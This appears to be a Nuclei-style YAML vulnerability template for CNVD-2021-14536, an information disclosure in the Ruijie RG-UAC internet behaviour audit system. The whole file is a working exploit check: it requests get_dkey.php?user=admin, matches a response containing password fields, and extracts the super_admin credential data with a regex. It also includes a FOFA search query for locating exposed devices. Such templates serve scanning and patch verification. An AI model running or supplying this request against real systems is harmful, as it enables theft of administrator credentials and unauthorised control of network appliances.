39 lines
997 B
YAML
39 lines
997 B
YAML
id: CNVD-2021-14536
|
|
|
|
info:
|
|
name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
|
|
author: daffainfo
|
|
severity: high
|
|
description: Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
|
|
reference: https://www.adminxe.com/2163.html
|
|
metadata:
|
|
fofa-query: title="RG-UAC登录页面"
|
|
tags: ruijie,cnvd,cnvd2021,disclosure
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/get_dkey.php?user=admin"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"pre_define"'
|
|
- '"auth_method"'
|
|
- '"name"'
|
|
- '"password"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'
|